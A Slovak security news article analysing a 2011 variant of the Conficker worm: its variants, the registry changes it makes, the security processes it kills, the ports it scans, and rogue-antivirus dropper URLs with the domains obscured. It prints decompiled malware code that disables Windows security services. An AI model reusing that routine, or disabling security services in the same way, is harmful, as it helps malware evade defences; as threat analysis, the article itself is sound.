Bezpečnosť > news
Conficker C, varianta z 11.3.2011
11.marca 2011 vydala skupina neznámych tvorcov, asi z Číny, novú variantu víru Conficker C, ktorá je podstatne iná než predošlé varianty confickeru B a C. Tak si trochu naň posvietime. Existuje v súčasnosti 5 poddruhov Confickeru, ktoré majú veľa spoločných znakov ale v podstate nejde o nejaké veľké rozdiely.
Conficker A
Činnosť: zneužitie NetBIOS a chyby MS08-067
Spôsob updatu: HTTP
Ochrana (self-defence): bez ochrany
Conficker B
Činnosť: zneužitie NetBIOS, chyby MS08-067, výmenné média, (vytvára Autorun súbor (trojan)), slovníkový útok na share ADMIN$
Spôsob updatu: HTTP, NetBIOS na odstránenie záplaty opravujúcej chybu MS08-067 a obnovenie backdooru
Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup
Conficker C
Činnosť: zneužitie NetBIOS, chyby MS08-067, výmenné média, (vytvára Autorun súbor (trojan)), slovníkový útok na share ADMIN$
Spôsob updatu: HTTP, NetBIOS na odstránenie záplaty opravujúcej chybu MS08-067 a obnovenie backdooru, vytvorenie URL remote linky na botnet.
Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup
Conficker D
Činnosť: žiadna činnosť, ide o update Confickeru C a následný update na Conficker E
Spôsob updatu: HTTP, kontroluje v okolí infikované PC a spustí update.
Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup (zakáže pripájanie k istým stránkam, hlavne výrobcov antivírových riešení) opatchovaním DNSAPI.dll (Windows XP) alebo DNSRSLVR.dll (Windows Vista, Seven)
Conficker E
Činnosť: zneužitie NetBIOS, chyby MS08-067, výmenné média, (vytvára Autorun súbor (trojan)), slovníkový útok na share ADMIN$
Spôsob updatu: HTTP z IP poolu Ukrajiny, NetBIOS na odstránenie záplaty opravujúcej chybu MS08-067 a obnovenie backdooru, vytvorenie URL remote linky na botnet.
Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup, odstavenie alebo infikovanie procesov antimalware programov, reset služby obnovovania systému (zmaže predošlé restore pointy a vytvotí ich nové s vlastnou kópiou).
Ako vidieť nie je to úplne jednoduché členenie. Vo svojej podstate sa v súčasnosti dá stretnúť len s dvomi variantami Confickeru - C a E. Bežne je v povedomí, že Conficker bol vyriešený v roku 2009-2010 hlavne záplatami na Windows XP a Server 2003 (chyba MS08-067). Ako som v novinke písal 11.3.2011 bola vydaná nová varianta. Ide o mutáciu Conficker C, ktorá obsahuje všetky vymoženosti varianty E a k tomu špecialitku - snahu získať kontrolu alebo údaje z Active Directory, ak sa napadnuté PC nachádza v sieti s doménou. Heslá sa pokúša zistiť za pomoci RainbowTables zo získaných hash.
Kontroluje si dátum na nasledovných serveroch:
Ask.com Google.com Baidu.com Yahoo.com W3.org
Zastaví navyše procesy - Windows Security Center Service (wscsvc), BITS (Background Intelligent Transfer Service) Windows Error Reporting Service (wersvc) a Error reporting service.
V registroch si vytvorí nové kľúče:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
%random name% = rundll32.exe %letra unidad%\RECYCLER\%random name%\%random filename.vmx
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
TcpNumConnections = 0x00FFFFFE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\netsvcs
Image Path = %sysdir%\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\netsvcs\Parameters
ServiceDll = %name of the drive%\RECYCLER\%random name%\%random filename%.vmx
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters pridá "TcpNumConnections" = "0x00FFFFFE" a pridá list blokovaných domén.
A upraví nasledovné:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue = 1 na 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SuperHidden = 1 na 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden = 1 na 0
Čím ukryje všetky súbory a priečinky s atribútom skrytý.
Pre zaujímavosť postup deaktivácie bezpečnostných služieb a procesov :
BOOL disable_security_services_and_terminate_conficker_cleaners() { HANDLE v; void *ThreadId; ThreadId = this; disable_security_service("wscsvc"); disable_security_service("WinDefend"); disable_security_service("wuauserv"); disable_security_service("BITS"); disable_security_service("ERSvc"); disable_security_service("WerSvc"); SHDeleteValueA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion \\Run", "Windows Defender"); callSHDeleteKeyW( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\ShellServiceObjects\\ {FD6905CE-952F-41F1-9A6F-135D9C6622CC}"); callSHDeleteKeyW(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot"); v = CreateThread(0, 0, monitor_and_terminate_conficker_cleaners, 0, 0, (DWORD *) &ThreadId); return CloseHandle(v); } int disable_security_service(LPCSTR lpServiceName) { void *hSCObject; char ServiceStatus; int v; result = 0; hSCObject = OpenSCManagerA(0, 0, SC_MANAGER_ALL_ACCESS); // open service manager with all access granted if ( hSCObject ) { v = OpenServiceA(hSCObject, lpServiceName, 0x20027u); // open the specified service if ( v ) { if ( QueryServiceStatus(v, (struct _SERVICE_STATUS *)&ServiceStatus) ) // query the service status { if ( ServiceType != SERVICE_KERNEL_DRIVER ) // check if the service is not a device driver { success = ControlService(v, 1u, (struct _SERVICE_STATUS *) &ServiceStatus); // notifies the service that it should stop if ( success ) Sleep(4000); // sleep 4 seconds } } result |= ChangeServiceConfigA(v, 0xFFFFFFFFu, 4u, 0xFFFFFFFFu, 0, 0, 0, 0, 0, 0, 0); // set the service configuration so that the service is never started CloseServiceHandle(v); } CloseServiceHandle(hSCObject); } return result; }
Obr. činnosť Conficker C
Conficker si preverí a zastaví zoznam 23 programov a vlákien k nim:
autoruns
avenger
confick
downad
filemon
gmer
hotfix - security patche Microsoftu
kb890 - patch Microsoftu
kb958 - patch Microsoftu
kido
klwk
mbsa.
mrt
mrtstub
ms08-06 - patch Microsoftu
procexp
procmon
regmon
scct_
sysclean
tcpview
unlocker
wireshark
Táto varianta Confickeru C prevedie scan TCP a UDP portov 0, 1, 2, 5, 10, 14, 23, 27, 31, 36, 37, 39, 42, 46, 49, 50, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 127, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 191, 197 a 223 - 255.
Následne niektorý z nich náhodne vyberie a pripojí sa k P2P botnetu.
Obr. Pripojenie k botnetu.
Výsledkom rozšírenia novej verzie Confickeru je plošný SQL injection útok z 3/2011, ktorý bol vykonaný z botnetu Asprox v Číne (typu FasFlux) za účelom rozšírenia rouge AV (freesystemscan.exe).
Obr. Asprox botnet
Stiahnuť si ho môžete ako súčasť rouge antivíru Windows Stability Center (alternatívne názvy - Red Cross Antivirus, Peak Protection 2011, Pest Detector, Major Defense Kit, ThinkPoint, AntiSpySafeguard, AntiSpy Safeguard). Poprípade na infikovaných stránkach kde je dropper, ktorý stiahne tento rouge AV (zmenil som doményale i tak je jednoduché sa k tomu dopracovať):
lizamoon.xxp/ur.php
tadygus.xxp/ur.php
alexblane.xxp/ur.php
alisa-carter.xxp/ur.php
online-stats201.xxp/ur.php
stats-master111.xxp/ur.php
agasi-story.xxp/ur.php
general-st.xxp/ur.php
extra-service.xxp/ur.php
t6ryt56.xxp/ur.php
sol-stats.xxp/ur.php
google-stats49.xxp/ur.php
google-stats45.xxp/ur.php
google-stats50.xxp/ur.php
stats-master88.xxp/ur.php
eva-marine.xxp/ur.php
stats-master99.xxp/ur.php
worid-of-books.xxp/ur.php
google-server43.xxp/ur.php
tzv-stats.xxp/ur.php
milapop.xxp/ur.php
Autori sa predpokladajú z Číny (vzhľadom k použitiu čínskeho botnetu) ale je tu isté podozrenie aj smerom k USA. Dôvod je jednoduchý, najviac infekciíí bolo zatiaľ v Číne, Austrálií a Brazílií.
|